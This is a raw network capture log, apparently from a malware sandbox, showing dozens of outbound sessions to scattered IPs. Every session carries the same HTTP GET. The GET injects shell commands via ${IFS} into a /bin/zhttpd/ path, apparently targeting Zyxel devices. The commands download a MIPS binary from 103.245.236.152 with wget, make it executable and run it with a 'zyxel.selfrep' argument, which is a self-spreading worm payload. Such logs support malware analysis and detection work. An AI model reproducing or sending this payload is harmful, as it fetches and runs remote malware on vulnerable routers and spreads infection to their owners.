                                      Jan 14, 2024 15:50:48.352124929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4899192.168.2.1433454128.231.171.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352158070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4900192.168.2.1450160124.100.72.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352217913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4901192.168.2.1441774136.41.29.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352247953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4902192.168.2.1459732130.40.163.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352320910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4903192.168.2.1445378207.114.44.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352377892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4904192.168.2.14343709.2.212.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352447033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4905192.168.2.144975237.130.16.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352498055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4906192.168.2.1434624190.59.57.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352534056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4907192.168.2.1458038144.190.31.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352591038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4908192.168.2.1434338146.27.201.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352650881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4909192.168.2.1439504217.167.89.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352715015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4910192.168.2.1433226206.140.128.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352778912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4911192.168.2.143470091.213.16.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352830887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4912192.168.2.1440628175.68.153.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352859020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4913192.168.2.1439012202.13.206.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352941036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4914192.168.2.144767683.31.9.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352992058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4915192.168.2.1451886219.124.100.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353046894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4916192.168.2.1451352110.70.31.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353137970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4917192.168.2.1454916152.186.221.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353205919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4918192.168.2.144730049.16.108.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353247881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4919192.168.2.145004444.46.114.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353311062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4920192.168.2.1457728168.53.11.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353358030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4921192.168.2.1435950156.199.74.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353403091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4922192.168.2.1440522194.103.61.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353431940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4923192.168.2.144232662.54.70.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353496075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4924192.168.2.144469282.203.78.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353557110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4925192.168.2.145038848.152.142.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353590012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4926192.168.2.143330447.193.149.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353646040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4927192.168.2.1437804174.13.208.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353692055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4928192.168.2.144137857.94.47.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353741884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4929192.168.2.1438712135.149.201.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353800058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4930192.168.2.1451122211.91.96.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353854895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4931192.168.2.1444518169.70.65.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353913069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4932192.168.2.145120668.137.235.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.353961945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4933192.168.2.1459202105.33.42.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354033947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4934192.168.2.1444992142.136.243.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354101896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4935192.168.2.1437186131.170.30.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354125023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4936192.168.2.1443322146.164.66.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354198933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4937192.168.2.144977447.43.40.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354253054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4938192.168.2.144504065.4.216.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354293108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4939192.168.2.1435826184.104.91.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354341030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4940192.168.2.1457236112.24.57.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354433060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4941192.168.2.145694086.171.130.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354487896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4942192.168.2.1449092168.167.220.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354552984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4943192.168.2.144878453.218.19.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354628086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4944192.168.2.1460116208.77.203.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354684114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4945192.168.2.144209277.197.197.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354728937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4946192.168.2.145970693.5.153.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354794979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4947192.168.2.1456764219.8.1.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354857922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4948192.168.2.1460180167.209.252.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354917049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4949192.168.2.1435260168.108.96.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.354947090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4950192.168.2.143845227.154.232.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355016947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4951192.168.2.1453140177.109.215.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355094910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4952192.168.2.1456008166.117.102.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355142117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4953192.168.2.144175419.58.22.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355201960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4954192.168.2.1453018152.160.87.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355226040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4955192.168.2.1445706175.75.67.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355276108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4956192.168.2.1456914166.184.169.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355345011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4957192.168.2.1441842201.250.11.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355393887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4958192.168.2.1460664147.142.211.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355446100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4959192.168.2.1445474190.117.33.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355499983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4960192.168.2.1458300143.5.189.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.355552912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4961192.168.2.1438460168.84.164.41443
                                      TimestampBytes transferredDirectionData
